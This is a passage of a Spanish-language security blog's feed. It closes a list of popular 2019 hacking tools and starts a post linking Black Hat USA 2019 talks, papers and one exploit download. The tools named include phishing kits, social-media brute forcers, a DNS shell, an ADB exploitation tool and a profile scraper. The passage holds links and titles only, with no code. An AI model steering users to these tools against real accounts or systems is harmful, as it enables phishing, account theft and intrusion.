&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYmy8yELk673m6S482g6lUPqqzWyx4nEJ8rfPMJmsiR58e4J95ufXqLWlzjqp0I1n1ABAzpyuAk1Ho6NvpEIocu2ugOyTXB76PDchPgqjmfYhUvIvO-a0orkTCWn6Xgekl20lXxEAoT7r3/s1600/LOIC.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="524" data-original-width="998" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYmy8yELk673m6S482g6lUPqqzWyx4nEJ8rfPMJmsiR58e4J95ufXqLWlzjqp0I1n1ABAzpyuAk1Ho6NvpEIocu2ugOyTXB76PDchPgqjmfYhUvIvO-a0orkTCWn6Xgekl20lXxEAoT7r3/s400/LOIC.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/04/easysploit-metasploit-automation-easier.html" target="_blank"&gt;EasySploit - Metasploit Automation (EASIER And FASTER Than EVER)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAoxL1DCCpkKpujry8ry9K3uc69vzy3Sm6T5SJBP2T6Rgp7VQbgpXH7lnrBOxPXT85am7cplalUAY50KNGH35c7lZHbE051OurwnW63ZwOAFivhJDDvvbKhSK-wBqiGZnAa34C-7P4Cy-f/s1600/EasySploit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="720" data-original-width="1280" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAoxL1DCCpkKpujry8ry9K3uc69vzy3Sm6T5SJBP2T6Rgp7VQbgpXH7lnrBOxPXT85am7cplalUAY50KNGH35c7lZHbE051OurwnW63ZwOAFivhJDDvvbKhSK-wBqiGZnAa34C-7P4Cy-f/s400/EasySploit.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/04/scanqli-scanner-to-detect-sql-injection.html" target="_blank"&gt;ScanQLi - Scanner To Detect SQL Injection Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSvn3RYloRJAgWB-XcletLxhST65mUnx8JwMuhzH8MVqG0Ey3RGuLvoFDmSEfVHU_qnStP1W8fmjyJt-o-zskZ9y-C8qrIIzZOfKDa8keJ_8G855NEoEmUmaqN1_2zmr73YUzXDbPMPQrV/s1600/ScanQLi_4_scanqli.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="257" data-original-width="934" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSvn3RYloRJAgWB-XcletLxhST65mUnx8JwMuhzH8MVqG0Ey3RGuLvoFDmSEfVHU_qnStP1W8fmjyJt-o-zskZ9y-C8qrIIzZOfKDa8keJ_8G855NEoEmUmaqN1_2zmr73YUzXDbPMPQrV/s400/ScanQLi_4_scanqli.jpeg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/10/sqlmap-v1310-automatic-sql-injection.html" target="_blank"&gt;SQLMap - Automatic SQL Injection And Database Takeover Tool&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4ETNJFAkR6Xylu9XwHbRt8vIwZba1kl42GBBRrx4fy_0ZhGAGRPw6U7gsATzMDA226TqTx7ymEB0KqI1bFLtiqv6J_r93qKGT1m9PW7h_tfxCUlXm72DkqHL9bAX2B1rUD6k6yb_lrO3I/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="568" data-original-width="602" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4ETNJFAkR6Xylu9XwHbRt8vIwZba1kl42GBBRrx4fy_0ZhGAGRPw6U7gsATzMDA226TqTx7ymEB0KqI1bFLtiqv6J_r93qKGT1m9PW7h_tfxCUlXm72DkqHL9bAX2B1rUD6k6yb_lrO3I/s400/sqlmap.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/12/okadminfinder-admin-panel-finder-admin.html" target="_blank"&gt;OKadminFinder - Admin Panel Finder / Admin Login Page Finder&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcElPrPnCAb6Q2KE_js0yODxiIZS5eg8pMk2wW4PfvLzqnjyYb9Nihrl72oip4tjvcJxwMHzFRsWtm8ic14fJJPmzhlW-8aC_50TcY8PBS245pokqXcasiiKCv5cUsyJis4w0ez7TbaaQ-/s1600/okadminfinder3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="320" data-original-width="1029" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcElPrPnCAb6Q2KE_js0yODxiIZS5eg8pMk2wW4PfvLzqnjyYb9Nihrl72oip4tjvcJxwMHzFRsWtm8ic14fJJPmzhlW-8aC_50TcY8PBS245pokqXcasiiKCv5cUsyJis4w0ez7TbaaQ-/s400/okadminfinder3.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/06/shellphish-phishing-tool-for-18-social.html" target="_blank"&gt;Shellphish - Phishing Tool For 18 Social Media (Instagram, Facebook, Snapchat, Github, Twitter...)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEUv7HDtfR7md6nInB-rPzHikei7JifGPJUigLJw6YxOxLgSBG7mgLAQjV-r-QLyyay5-wGb0VIu6x8QNYaSlI8cu5aItvt9Gfxhm_q5kX4tg5gBFNzE1QNBSdD-CvTF3kZmXkRTqarNIc/s1600/shellphish_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="480" data-original-width="611" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEUv7HDtfR7md6nInB-rPzHikei7JifGPJUigLJw6YxOxLgSBG7mgLAQjV-r-QLyyay5-wGb0VIu6x8QNYaSlI8cu5aItvt9Gfxhm_q5kX4tg5gBFNzE1QNBSdD-CvTF3kZmXkRTqarNIc/s400/shellphish_1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/03/dns-shell-interactive-shell-over-dns.html" target="_blank"&gt;DNS-Shell - An Interactive Shell Over DNS Channel&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFk11qJRHO5gIyLa9TRVACjJHd7m9KAIwHJJhq-YMC7uY9EGjykR1ueWnNnMkm4dknTel_Zz3PXi0dXmee9zZEnRWT63glPaUpazqUidE4j1fwnO30aDxu_TARO3974kmnY82BnR5p0maa/s1600/DNS-Shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="531" data-original-width="758" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFk11qJRHO5gIyLa9TRVACjJHd7m9KAIwHJJhq-YMC7uY9EGjykR1ueWnNnMkm4dknTel_Zz3PXi0dXmee9zZEnRWT63glPaUpazqUidE4j1fwnO30aDxu_TARO3974kmnY82BnR5p0maa/s400/DNS-Shell.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/04/qrljacker-v20-qrljacking-exploitation.html" target="_blank"&gt;QRLJacker - QRLJacking Exploitation Framework&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhdeqYfoDgQt97FU-8NbX_kou7vvZhvgWu656Q7zrjpUCp4BdDg1-lBSYdd-reuwCBkNlaOR4ltAwFLxIyd79cHmn0j6NeGzBiiXe6R92dsSfOfyHrND1XSfMw3K3-F7VqyAHIU9ri8QyX/s1600/QRLJacker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="747" data-original-width="1366" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhdeqYfoDgQt97FU-8NbX_kou7vvZhvgWu656Q7zrjpUCp4BdDg1-lBSYdd-reuwCBkNlaOR4ltAwFLxIyd79cHmn0j6NeGzBiiXe6R92dsSfOfyHrND1XSfMw3K3-F7VqyAHIU9ri8QyX/s400/QRLJacker.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/05/phonesploit-using-open-adb-ports-we-can.html" target="_blank"&gt;PhoneSploit - Using Open Adb Ports We Can Exploit A Devive&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJVBCQhQMhLliYw1x1nYZVW8-yBxgRXZgU2SED0RNj1_-73M9i3T0FV5fSFJRWyGB_rsSgicw_eIWj93vExHrg29u__6y0ScXjq34__e8F4a3MIO_UZg6ID5ZwX8opgJ4hb3QGLYnUr8x/s1600/PhoneSploit_1_Screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1366" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJVBCQhQMhLliYw1x1nYZVW8-yBxgRXZgU2SED0RNj1_-73M9i3T0FV5fSFJRWyGB_rsSgicw_eIWj93vExHrg29u__6y0ScXjq34__e8F4a3MIO_UZg6ID5ZwX8opgJ4hb3QGLYnUr8x/s400/PhoneSploit_1_Screenshot.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2018/09/socialbox-bruteforce-attack-framework.html" target="_blank"&gt;SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl9iHs2oAUdfxFTqYMaiS05lS1ijhG6eTUF4BCjP-wRPi6eCT8rgagAzGWiSoRbI5K7CurSW0cjLQf1t0zI2smCuCO5AQQexrkxb2rGI71nrI1h0PoYK648nEgrjLT_6EtP1bQy6Luhs9a/s1600/SocialBox_1_sb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="405" data-original-width="577" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl9iHs2oAUdfxFTqYMaiS05lS1ijhG6eTUF4BCjP-wRPi6eCT8rgagAzGWiSoRbI5K7CurSW0cjLQf1t0zI2smCuCO5AQQexrkxb2rGI71nrI1h0PoYK648nEgrjLT_6EtP1bQy6Luhs9a/s400/SocialBox_1_sb.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/04/instainsane-multi-threaded-instagram.html" target="_blank"&gt;Instainsane - Multi-threaded Instagram Brute Forcer&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_uWPsY1NzQdCyGOSAvExy2NVJRFqb_LnW7QASIVmekOnys0QVpdrdYk0tyjS_kinA6T2q7MkMiAOb7_bEJjKZ7lCE_rrFYCHPmEBfriRFotIPpNSVxhv5RCa9GjscXLZNcu8VJFz-Qcn/s1600/instainsane_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="491" data-original-width="616" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_uWPsY1NzQdCyGOSAvExy2NVJRFqb_LnW7QASIVmekOnys0QVpdrdYk0tyjS_kinA6T2q7MkMiAOb7_bEJjKZ7lCE_rrFYCHPmEBfriRFotIPpNSVxhv5RCa9GjscXLZNcu8VJFz-Qcn/s400/instainsane_1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/01/tool-x-kali-linux-hacking-tool-installer.html" target="_blank"&gt;Tool-X - A Kali Linux Hacking Tool Installer&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoR5xc2-5vzQjTAtY0QI7nMBw8dZHRPkYrOL_2ANSOTjE0Khc6YHqLyDFezZXZPBT_MV4BVDbreZ5XXoSj9Nw5HfwYLoU_Gz96FuaDrLxdbLiYp3AFanKoXkcevbvfjYHht9G7okAOhUJW/s1600/Tool-X_1_Logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="818" data-original-width="799" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoR5xc2-5vzQjTAtY0QI7nMBw8dZHRPkYrOL_2ANSOTjE0Khc6YHqLyDFezZXZPBT_MV4BVDbreZ5XXoSj9Nw5HfwYLoU_Gz96FuaDrLxdbLiYp3AFanKoXkcevbvfjYHht9G7okAOhUJW/s400/Tool-X_1_Logo.png" width="390" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/08/hacktronian-all-in-one-hacking-tool-for.html" target="_blank"&gt;Hacktronian - All In One Hacking Tool For Linux &amp;amp; Android&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1zNZXfNUhF_0xHfnBlfObpySQLYc-NMVsUdxZ-Wnsf9n2hN7uWbROCRDAOK8hyHpACA9uGEyue_3EzZAVf8AegdVTolrPtPaz2NWVHYzHeXZpAUK80e0T3EnhP0MOVvuZjHgF5VKW53S9/s1600/hacktronian_1_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="280" data-original-width="683" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1zNZXfNUhF_0xHfnBlfObpySQLYc-NMVsUdxZ-Wnsf9n2hN7uWbROCRDAOK8hyHpACA9uGEyue_3EzZAVf8AegdVTolrPtPaz2NWVHYzHeXZpAUK80e0T3EnhP0MOVvuZjHgF5VKW53S9/s400/hacktronian_1_logo.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/11/ultimate-facebook-scraper-bot-which.html" target="_blank"&gt;Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiaktVaooZBiH63Oqfq_8C8Ji_JBkwIYeEg1WQXS7cfTJ711X26gqnkSioXxKVYlXWbMv1VF2YpPQfgU4yhyQovUXATPHWa4Sa08XLd5xqdBZlosML-VMesrpYIxmVblCTwJM684dhAiEc/s1600/Ultimate-Facebook-Scraper_19_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="789" data-original-width="768" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiaktVaooZBiH63Oqfq_8C8Ji_JBkwIYeEg1WQXS7cfTJ711X26gqnkSioXxKVYlXWbMv1VF2YpPQfgU4yhyQovUXATPHWa4Sa08XLd5xqdBZlosML-VMesrpYIxmVblCTwJM684dhAiEc/s400/Ultimate-Facebook-Scraper_19_screenshot.png" width="388" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Fuente: &lt;/b&gt;&lt;a href="https://www.kitploit.com/2019/12/top-20-most-popular-hacking-tools-in.html" target="_blank"&gt;https://kitploit.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Saludos y feliz año nuevo!!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD_Ds4DUGVOsDW-O9ZjsXROzlh5Lz0h1K0Rr6R3PSMazvnW4eZGAff_pJBMD1B4l4QLD70qoWV0qgmDGQ36NAfGEURcZNJTdDTmIxxGT6VZszX68EaQozbk_hQuzZA5a5qDX-SpECFr4Vu/s72-c/best-tools-2019.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Material de Black Hat USA 2019 [Presentaciones, Papers y Herramientas]</title><link>http://www.blackploit.com/2019/08/material-de-black-hat-usa-2019.html</link><category>Black Hat</category><category>Presentaciones</category><category>Video</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Wed, 28 Aug 2019 18:14:00 -0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-5953593618218040727</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizZdFd5lF4vbOYOzd-1F3ysv6fCsdgzbjy-aOkaPVl4MOVIJa0i2L3HzazLKRaLyoJ342CNhr1QBuFBlQ0Tl8cYxZgTqHOCPdrXFtqLncpZttMMH1uaWBvCe49MPweTmvVOSjzaGqQ8Y4B/s1600/blackhat_2019.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="564" data-original-width="1080" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizZdFd5lF4vbOYOzd-1F3ysv6fCsdgzbjy-aOkaPVl4MOVIJa0i2L3HzazLKRaLyoJ342CNhr1QBuFBlQ0Tl8cYxZgTqHOCPdrXFtqLncpZttMMH1uaWBvCe49MPweTmvVOSjzaGqQ8Y4B/s640/blackhat_2019.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Black Hat USA&lt;/b&gt;
 es el evento de seguridad de la información más importante del mundo, 
proporcionando a los asistentes lo último en investigación, desarrollo y
 tendencias. Todos los años asistentes de todas partes y de cualquier 
rubro, viajan a la conferencia para aprender lo último en ciberseguridad
 y hacking.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Este es su año 22° y ya han liberado los &lt;a href="https://www.youtube.com/playlist?list=PLH15HpR5qRsWrfkjwFSI256x1u2Zy49VI" target="_blank"&gt;vídeos&lt;/a&gt; de las presentaciones:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Every Security Team is a Software Team Now&lt;/li&gt;
&lt;li&gt;Detecting Deep Fakes with Mice

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Williams-Detecting-Deep-Fakes-With-Mice.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Williams-Detecting-Deep-Fakes-With-Mice-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Bypassing the Maginot Line: Remotely Exploit the Hardware Decoder on Smartphone

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Gong-Bypassing-The-Maginot-Line-Remotely-Exploit-The-Hardware-Decoder-On-Smartphone.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Gong-Bypassing-The-Maginot-Line-Remotely-Exploit-The-Hardware-Decoder-On-Smartphone-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A Decade After Bleichenbacher '06, RSA Signature Forgery Still Works

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Chau-A-Decade-After-Bleichenbacher-06-RSA-Signature-Forgery-Still-Works.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Chau-A-Decade-After-Bleichenbacher-06-RSA-Signature-Forgery-Still-Works-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;ClickOnce and You're in - When Appref-ms Abuse is Operating as Intended

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Legal GNSS Spoofing and its Effects on Autonomous Vehicles&lt;/li&gt;
&lt;li&gt;Biometric Authentication Under Threat: Liveness Detection Hacking

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Chen-Biometric-Authentication-Under-Threat-Liveness-Detection-Hacking.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Chen-Biometric-Authentication-Under-Threat-Liveness-Detection-Hacking-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Battle of Windows Service: A Silver Bullet to Discover File Privilege Escalation Bugs Automatically

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Wu-Battle-Of-Windows-Service-A-Silver-Bullet-To-Discover-File-Privilege-Escalation-Bugs-Automatically.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;SSO Wars: The Token Menace

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Munoz-SSO-Wars-The-Token-Menace.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Munoz-SSO-Wars-The-Token-Menace-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Monsters in the Middleboxes: Building Tools for Detecting HTTPS Interception

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Valenta-Monsters-In-The-Middleboxes-Building-Tools-For-Detecting-HTTPS-Interception.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Exploiting the Hyper-V IDE Emulator to Escape the Virtual Machine&lt;/li&gt;
&lt;li&gt;Hacking for the Greater Good: Empowering Technologists to Strengthen Digital Society&lt;/li&gt;
&lt;li&gt;Dragonblood: Attacking the Dragonfly Handshake of WPA3

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Vanhoef-Dragonblood-Attacking-The-Dragonfly-Handshake-Of-WPA3.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Vanhoef-Dragonblood-Attacking-The-Dragonfly-Handshake-Of-WPA3-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Most Secure Browser? Pwning Chrome from 2016 to 2019

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Feng-The-Most-Secure-Browser-Pwning-Chrome-From-2016-To-2019.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Feng-The-Most-Secure-Browser-Pwning-Chrome-From-2016-To-2019-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Attacking and Defending the Microsoft Cloud (Office 365 &amp;amp; Azure AD)

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Metcalf-Attacking-And-Defending-The-Microsoft-Cloud.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;PicoDMA: DMA Attacks at Your Fingertips

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Sandin-PicoDMA-DMA-Attacks-At-Your-Fingertips.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;APIC’s Adventures in Wonderland

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Matula-APICs-Adventures-In-Wonderland.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Matula-APICs-Adventures-In-Wonderland-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.ernw.de/download/om/blackhat/us-19-Matula-Block-APICs-Adventures-In-Wonderland-Exploits.zip"&gt;Download Tool&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Behind the Scenes: The Industry of Social Media Manipulation Driven by Malware

&lt;ul&gt;
